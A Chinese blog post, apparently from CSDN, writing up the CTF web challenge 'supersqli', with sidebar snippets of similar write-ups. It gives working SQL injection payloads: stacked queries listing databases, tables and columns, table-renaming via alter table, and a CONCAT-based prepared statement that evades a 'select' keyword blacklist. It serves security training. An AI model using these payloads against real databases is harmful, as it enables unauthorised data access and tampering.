攻防世界-supersqli详解

最新推荐文章于 2024-07-19 22:11:45 发布
最新推荐文章于 2024-07-19 22:11:45 发布
阅读量6.4k 收藏 35
点赞数 9
分类专栏: 攻防世界web高手进阶 supersqli 文章标签: 攻防世界-web进阶
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_helloword/article/details/107935479
版权

supersqli

查看是否存在SQL注入

1' and 1=1 #

在这里插入图片描述
用二分法查看列数(有两列)

1' order by  2 #

在这里插入图片描述
使用联合查询发现做了SQL注入黑名单禁止出现以下关键字
在这里插入图片描述

堆叠注入

接下来我们尝试堆叠注入:
查询数据库:(输入框里的–+做了过滤,但在url里依然可以用)

;show databases;--+

在这里插入图片描述
查表:

';show tables;--+

在这里插入图片描述
分别查询两个表的字段
(字符串为表名进行操作时要加反引号)

; show columns from `1919810931114514` ;--+
; show columns from `words` ;--+

word:flag,NO字段
在这里插入图片描述
1919810931114514:id,NO等等字段
在这里插入图片描述

查询字段内容

这里有两种方法:1.一种改表名 2.预编译
方法一:
根据在words表里发现id字段与查询框里的出的数据类型相同,一个数字,一个字符串,所以猜测默认查询的就是words表,inject(搜索框中)值应该赋给了id
利用:我们可以将含有flag字段的表命名为word,然后修改字段名字,不就查询到我们想要的结果!(前提是这里rename,alert关键字 没有做过滤)

 ; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50); #
 拆开:
;  alter tables words rename to words1; 
;  alter tables `1919810931114514` rename to words ;
;  alter tables words change flag id varchar(50); #

查看flag:

1' or 1=1 #

在这里插入图片描述
1’ or 1=1 #

**方法二:**预编译来绕过

构造payload:

';sEt @sql = CONCAT('se','lect * from `1919810931114514`;');prEpare stmt from @sql;EXECUTE stmt;#

';sEt @sql = CONCAT(‘se’,‘lect * from 1919810931114514;’); 进行预编译
prEpare stmt from @sql; 设置变量
EXECUTE stmt;# 执行
在这里插入图片描述
flag:
flag{c168d583ed0d4d7196967b28cbd0b5e9

Mr H
关注
  • 9
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
攻防世界(web篇)---supersqli
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-09 607
一开始就是查询word表中的数据,所以我们可以利用数据库修改表名和列名的方法先把原来的words表名字改成别的,再将1919810931114514表的名字改为words再将改完名字后的表中的flag字段改为 id (id同样需要show columns from word得到)然后我们用1’ or 1=1 --+直接就能得到flag...
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询框里过滤了,在url框里没有) 在使用union select时发现过滤关键字 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200313161718411.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpd
supersqli_攻防世界
u014794949
10-23 410
进入题目发现是文本框提交,通过尝试确定闭合字符和注入点 order by确定存在2个字段 1' order by 2# union select查询发现关键字过滤 通过堆叠注入得到库名 1';show databases;# 尝试得到表名 1';show tables;# 尝试得到两表中的列名 1';show columns from `1919810931114514`;# 1';show columns from `words`;# flag列中比较可能存放答案,words表里
攻防世界新手模式lucknum
最新发布
2302_79735426的博客
07-19 163
1.__isoc99_scanf()这个函数为一个输入函数。故先找到__isoc99_scanf()这个函数。发现并没有进行特殊处理,只是返回用户输入的值。2.当用户输入7时直接输出flag。所以只要用户输入7就能得到flag。下载附件后放入64位的ida分析。
攻防世界——supersqli
weixin_62281892的博客
09-18 1820
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。到这里我们的表列名就已经修改完毕,此时还会输出修改完成的words列名,最后通过万能钥匙1' or '1'='1即可得到输出。由于注入框的查询是对列id的搜索,此时参考两个表的列名,需要将flag列名改为能够查找的id列(修改包括名称和数据类型)。上网冲浪了解了一波,好像是类似黑名单,这些词会被替换,那没办法了,我们就用堆叠注入。
supersqli
怪味巧克力的博客
05-27 4529
0x01 拿到题目后,发现是单引号报错字符型注入 order by 2的时候页面正常回显,order by 3的时候页面出错,所以我们知道只有两个字段。 接下来union联合查询,发现select被过滤了 所以我们需要绕过select的过滤,下面有几种方法 0x02 堆叠查询+预编译 我们发现这里可以执行多sql语句,所以我们可以采用堆叠查询,那我们查询表名,结果如下: 查询表名中的列名,结果如下: 所以我们找到flag在第一个表中,那么接下来我们要查看flag中的内容,但是这里select被过滤了
攻防世界——supersqli进阶
qq_62046696的博客
05-04 1556
关于sqil的题目,这个真的是知识面太杂了。我研究了好几天,才看懂了这个题解。 打开场景以后,发现的是一个文本框,然后试一下有没有sql注入 先输入1发现回显正常,然后输入1‘发现出现错误,然后就可以判断存在sql注入 然后判断一下有几列,进行 1' order by 2#回显正常,但是1' order by 3#回显错误,所以可以确定一共有2列 发现select被禁用 然后就想到运用推叠注入, 想到首先查询一下数据库,然后发现supersqli这个就是要找的数据库 然后进行查表操作, ..
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界nice-bgm杂项
11-20
在网络安全领域,"攻防世界"是一个广受欢迎的在线平台,提供各种安全挑战,帮助学习者提升他们的黑客防御和攻击技能。"nice-bgm杂项"是其中的一个挑战,属于"misc"类别,这意味着它可能涉及到多种不同类型的解题技巧...
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界-supersqli
m0_63563528的博客
03-28 511
题目来源:强网杯 参考资料:金帛师傅的http://t.csdn.cn/KmxUY
攻防世界supersqli
金 帛的博客
03-08 7812
攻防世界WP
攻防世界 supersqli
lzu_lfl的博客
09-15 270
攻防世界 supersqli_WP
supersqli-攻防世界
szhangliwenya的博客
03-30 2121
因为 H 对应 ASCII 码值为 72,e 对应 ASCII 码值为 101,l 对应 ASCII 码值为 108,o 对应 ASCII 码值为 111。根据提交方式:POST注入,GET注入,HTTP HEAD注入。根据有无回显:联合注入,报错注入,布尔盲注,延时注入。1' and 1=1 #没报错判断为单引号字符注入。其他注入:堆叠注入,宽字节注入,二次注入等。1' order by 3#报错。
supersqli 攻防世界
qq_53030229的博客
11-22 447
文章目录一、知识拓展1、我在mi数据库中创建了一个数据表2、使用handler读取数据二、堆叠注入1、查找注入点2、查看数据库、数据表3、查看表的内容 一、知识拓展 mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据 1、我在mi数据库中创建了一个数据表 2、使用handler读取数据 总结下来就四条命令,不难,你们自己尝试动手一下,加深印象,handler打开后要关闭,没有关闭下次打不开 HANDLER mi open; 打开mi表
攻防世界supersqli
weixin_52268949的博客
02-09 688
supersqli 补充知识点 rename 命令格式: rename table 原表名 to 新表名 例如,在表myclass名字更改为youclass: mysql>rename table myclass to youclass; alter和change,使用change子句,语法有很大的不同。在change关键字之后,紧跟着的是你要修改的字段名,然后指定新字段名及类型,例子 mysql> alter table testalter_tbl change i j int 补充完成了这
攻防世界 supersqli 解题思路
xj28555的博客
07-14 1533
随便注,初步判断是有注入点的,那我们进入题目 提交一个1试一试 再在1的后面加个单引号试一试 报错了,然后我们判断有几个字段。 回车后正常,但是换成3后就报错了,所以有两个字段。 当我想用联合查询查询用户和数据库的时候 爆出一段正则表达式,发现过滤掉了图中的关键字。然后我寻找绕过点,发现了堆叠注入。 查询表 查询字段 发现flag,然后我们想办法读取flag值。因为select被正则表达式给过滤掉了,所以这里我们就要想一点骚姿势了。刚开始我想..
攻防世界-baby_web详解
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码来获取敏感信息或者执行未经授权的操作。 为了详细了解攻防世界-baby_web的攻击和防御方法,我们可以进行以下步骤: 1. 分析源代码:通过查看源代码,我们可以了解应用程序的结构和逻辑,以及可能存在的漏洞点。 2. 注入攻击:尝试使用注入攻击来获取数据库信息或者执行其他恶意操作。可以使用工具如sqlmap来自动化进行注入测试。 3. 防御措施:了解并实施防御措施,如输入验证、参数化查询、安全编码等,以防止注入攻击和其他常见的安全漏洞。 请注意,进行任何形式的攻击都是非法的,除非您是经过授权的安全专家或者在合法的渗透测试环境中进行。在现实世界中,攻击和防御是一个持续的过程,需要不断学习和更新知识。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值